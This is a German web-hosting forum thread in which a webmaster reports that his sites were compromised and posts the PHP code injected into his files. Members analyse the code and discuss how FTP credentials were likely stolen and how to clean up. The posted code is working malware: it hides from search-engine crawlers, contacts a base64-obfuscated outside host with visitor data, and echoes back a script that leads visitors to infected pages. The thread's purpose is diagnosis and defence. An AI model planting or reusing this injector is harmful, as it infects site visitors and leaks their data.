Seiten gehakt

bretterelse

Huhu

hatte bei vielen meiner Projekte folgenden Code am 14.12 eingeschleust bekommen

PHP

<?
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

Alles anzeigen

Der Code kam in unterschiedlichen Dateien bei unterschiedlichen Hostern vor.

Das wildeste war - er war auch in einem .htaccess geschützten Verzeichnis zu finden.

Da müssen doch die Passwörter vom FTP ausgespäht worden - ein Trojaner oder ähnliches?

Grüße

catcat

Verwendest Du zufällig FileZilla?
Was für ein CMS o.ä. verwendest Du denn?

Synonym

FTP kann, muss aber nicht. Jedenfalls war das war auf Fileebene, denn da gibt es den Passwortschutz der htaccess auch nicht. Kann FTP-Prog sein, aber auch ein anfälliges Script, das Files schreiben darf / kann.

Trojaner ist aber sehr wahrscheinlich. Scheint was mit dem hier zu tun zu haben:
*** Link veraltet ***

Und darauf bezogen wohl doch eher was im Bereich FTP-Zugangsdaten...

catcat

Da das bei unterschiedlichen Hostern war, tippe ich eher auf nen trojaner/keylogger/rootkit auf dem Rechner.
Ich empfehle da immer Malware Bytes: *** Link veraltet ***
Kostet nicht die Welt und macht richtich sauber auf der Pladde.

bretterelse

catcat - FlashFXP ist mein FTP-Prog. Ja, sogar noch tatsächlich Geld für bezahlt. Speichert die Passwörter auch schon irgendwie "kodiert" und nicht offen.

Vom CMS können wir hier glaube ich nicht reden - es waren
2x urlalte Etomite Installationen (so 8 jahre alt oder so - bei einer geht schon seit mind 5 Jahren die Verwaltung nicht mehr )
pphlogger Installation,
aber auch einige handgestrickte Seiten.

es waren .php, .html, .js Files betrofffen. Auch war es nicht nur die root-index. Auch an unterschiedlichen Stellen im Quelltext. Diesmal war das Datum der letzten Änderung "aktuell" - hatte schon mal was vergleichbares gehabt - das Änderungsdatum der Dateien blieb aber UNANGETASTET und dennoch wurde der Inhalt manipuliert... :diablo:

Habe eigentlich den Bitdefender als AV inkl Firewall hier laufen.. War vor Jahren zumindest mit das Beste AV/FW Programm.

Meldet mir auch in den letzten Tagen fleißig mehrere Trojaner und sonstigen Mist. (Ich glaube den Müll habe ich mir auf eigenen Seiten eingefangen). Vor diesem Problem war eigentlich schon lange Ruhe.

Werde mich wohl zwischen den Feiertage mal mit einer Win7 neu-Installation beschäftigen müssen. :kotz:
Wenn ich so nen Penner erwischen würde, wäre er nachher berufsunfähig was EDV angeht! :fluch:

Grüße Yury

Synonym

Zitat

Wenn ich so nen Penner erwischen würde, wäre er nachher berufsunfähig was EDV angeht!

So denke ich auch!

Das "schöne" dabei vor allem, der Code von oben wurde auch am 14.12. auf diversen "Code-Speicher-Seiten" als "Virus" gepostet und auch bei Twitter verbreitet.

Und das eben in Verbindung mit unter anderem dem W32/HackTool-Bla-irgendwas... Der kommt wohl per Java rein und wird von vielen Scannern erst seit dem 12. bzw 13. erkannt. Einige sogar erst noch viel später.

bretterelse

Ich kriege hier gleich einen Vogel :pirat: Das kann doch alles nicht wahr sein!

Will gerade die Entwicklungs-DB vor dem nächsten Schritt backupen, rufe die mysqldumper Installation auf => kommt eine weiße Seite. He, kann doch gar nicht sein, ist doch gerade 12 Std her das ich das letzte Backup gemacht habe.

Tja, Änderungsdatum der main.php und index.php 23.12. 04:58

:error:

Synonym

Tja, prinzipiell hast Du nun nur zwei mögliche Ansätze. Entweder die kamen nur über FTP und nur! auf das Homedir, dann reicht es eigentlich, FTP zu ändern und den lokalen PC neu aufzusetzen. Oder, wenn die über eine Sicherheitslücke auf dem Server kamen und/oder auch andere Dateien außerhalb des Homedir ändern konnten, dann ebenso Server platt machen. Wenn Du nicht ausschließen kannst, dass die auf dem Server Hintertüren geöffnet haben, dann auch Server platt machen.

bretterelse

Hör mir noch mit den Hintertüren auf dem Server auf, ich habe hier so viele Domainzugänge im FTP-Client *Katastrophe*

Alex07

Es wäre auf jeden FAll zu empfehlen die Logs mal anzuschauen. Das wichtigste ist erstmal die Lücke zu schliessen und weitere Hintertüren zu vermeiden. Wenn es der Server ist oder über Code der Server übernommen worden ist, empfielt es sich so gut wie alles neu zu machen. Ich habe sowas gelernt
Kompromitiertes System neu aufsetzen und Lücke finden und schliessen. LEider denke ich führt kein weg dran vorbei. Da ich sowas auch anbiete, auch erstmal kostenlos, kann ich dir meinen Sicherheitserver zum Testen empfehlen. Auch ich werde in die Logs schauen, das ist wirklich kostenlos.
Ich glaube so hab ich CatCAt kennengelernt damals im anderen Teich. Was wichtig ist das erstmal alles überprüft wird, dann weiter schauen in den Logs und ja ich kann den Sicherheitsserver immer Platt machen.
Da ist nur CC druff *g*
nene, ist ein eigenständiger Server
Keine Sorge CC
Bin heute lustig druff
Aber erstmal muss ich die letzen Rechnungen dieses Jahr erstellen und danach alle Server warten.. Heute Abend hätte ich Zeit auch für eine Übersicht.

Das biete ich übrigens allen Forenteilnehmern an, falls mal was ist. Ihr braucht kein Edel-Host Kunde zu sein, klar wäre es schön, wenns so wäre.
Aber ich hab damals vor laaaanger langer Zeit mal selber Scripte geschrieben, wenn ihr wisst was ich meine
. Mehr darf ich leider nicht sagen

Synonym

Also, mal abgesehen davon, wie die Daten da auf Deiner Server kamen, interessierte mich aber schon, was die da denn genau tun

Also, also erstes wird in dem Code ja erst mal jede größere Suchmaschine ausgeschlossen, bzw. die merkt die Änderung nicht. Ist vorteilhaft, so stuften Sumas die Seite schon mal nicht als "attackierend" ein, aber auch ein Problem, weil Besucher davon betroffen sind.

Der Code öffnet dann eine cURL-Verbindung zu hotlogupdate und von dort wird dann ein Javascript zurückgegeben. Dieses wird direkt ausgeführt. Im Script selbst ist dann ein iFrame enthalten, das seinerseits einen Thread in einem polnisches Forum aufruft (nenne ich hier mal lieber nicht, ist laut virustotal verseucht). Somit fängt sich also jeder Besucher, der keinen ausreichenden Schutz hat, über die Seite den Virus / Trojaner / Maleware des polnischen Forums ein.

Allerdings, und das ist das "Gute" an der Sache. Das Forum ist aktuell offline : Fehler 404...

bretterelse

mhh, so viel wie ich daraus lesen kann, war es über den FTP.. hier ein Ausschnitt vom FTP-Log

*** Link veraltet ***

bei den access_log war da nichts zu der Uhrzeit zu sehen..

bei der Geschwindigkeit - ganz klar ein Script - welches sich jedoch bestimmte Dateien nur schnappt??

Grüße

Synonym

Ja, schaut so aus, wenn das ein FTP-Log ist. Dennoch das Problem, dass da über FTP auch noch ganz andere Dinge gelaufen sind. Wenn man Files hochladen kann, dann kann man die auch ändern und herunterladen. z.B. Config-Files mit DB-Zugangsdaten. Dann, wurden die Daten direkt geändert oder heruntergeladen, bearbeitet und hochgeladen. Direkt geändert deutet ebenso auf ein zusätzliches Script hin. Und die letzte Problemfrage... Wie kamen die an die FTP-Daten?

catcat

Zitat von Synonym;11153

[...]Und die letzte Problemfrage... Wie kamen die an die FTP-Daten?

Da gibts ja nur 3 Möglichkeiten:

# Man in the Middle
# Trojaner/Rootkit/keylogger auf dem Rechner, der FTP-PWs und auch sonstige PWs abfischt
# Server/Router vor dem Server korrumpiert

Gegen Ersteres gibts SFTP oder SCP anstatt FTP (das PWs im Klartext überträgt)
Gegen Zweiteres gibts zB Malwarebytes
Gegen Letzteres gibts nur dem Hoster nen Rüffel zu geben und ggfls. den Hoster zu wechseln.

(Bei godaddy ist mir das des öfteren bei Webspace passiert. Da hatte ein anderer Webspacemieter auf demselben Server einige unsichere Scripte laufen und die verseuchten einfach den ganzen Server. Auch hat godaddy an der Sicherheit des Routers vor dem Server gespart.)

cura

Ach darum geht es. Ich dachte, da hätte einer einen Haken an die Seiten gemacht.

Ist mir gerade mal so aufgefallen, weil ich gestern einen Bericht dazu gesehen habe, dass Jugendliche kein richtiges Deutsch mehr können.

"Ich hase Facebook"

Fridolin

Zitat von cura;11645

"Ich hase Facebook"

Also Cura, daß darfste jetzt auch nicht sagen.
Übe dich ein wenig in Toleranz ... :hihi:

cura

>> Ich empfehle da immer Malware Bytes: Malwarebytes : Free anti-malware, anti-virus and spyware removal download _

Empehls besser nicht mehr CC. Ich wollte es mir mal anschauen und hab die Shareversion runtergeladen, einen Schnelllauf gemacht. Gefunden wurde nichts, aber nach dem Durchlauf dauerte es noch kein Minute und mir blieb der Rechner stehen. Konnte nicht mal mehr normal runterfahren, musste die Stromzufuhr kappen. Dann wieder hochgefahren, jetzt hab ich einen weissen Desc, es geht absolut nichts mehr, ich komme nicht mal mehr im abgesicherten Modus auf den Rechner, um dieses Scheissprogramm wieder zu löschen.

Haste jetzt noch einen Tip was ich machen kann, ausser den Rechner plattzumachen, womit auch alle Daten verloren wären?

So einen derben Mist hab ich bis heute nicht erlebt. Ein Programm, dass den Rechner absolut lahmlegt. Aber immerhin, da nichts mehr geht, könnte auch ein Rootkit nichts mehr ausrichten. Insofern ist die Sicherheit 100%.

Für den Beitrag hier musste ich aufs Lap zurückgreifen.

catcat

Also ich hab das seit gut 2 Jahren auf allen Rechnern (Vista und 7) drauf und sowas ist mir noch nie passiert *grübel

Ich könnte mir nur vorstellen, daß irgendeine Malware/Rootkit eine oder mehrere wichtige Dateien auf Deinem Rechner schon ersetzt/verändert hat und Malwarebytes hat die infizierten Dateien gekillt.

Wiederherstellungs-DVD? Knoppix? Beten?

grade gefunden: *** Link veraltet ***

guppy

Zitat von catcat;11954

Ich könnte mir nur vorstellen, daß irgendeine Malware/Rootkit eine oder mehrere wichtige Dateien auf Deinem Rechner schon ersetzt/verändert hat und Malwarebytes hat die infizierten Dateien gekillt.

So in diese Richtung denke ich auch.
Ist oft so, ich hatte mal irgend so ein Drecksding eingefangen, da konnte man keine Seite der Antivirensoftwarehersteller mehr aufrufen.
Ich hab von Cura noch so einen thread in Erinnerung, bei dem es schon einmal Probleme gab, davon vielleicht noch ein Kater.

Ach so und wer backup`s macht ist feige :floet:.

Ansonsten Knoppix und dann erst mal panda online durchlaufen lassen.

Margin

Erinnert mich an den GEMA-Trojaner und wäre in dem Fall ein zeitlicher Zufall.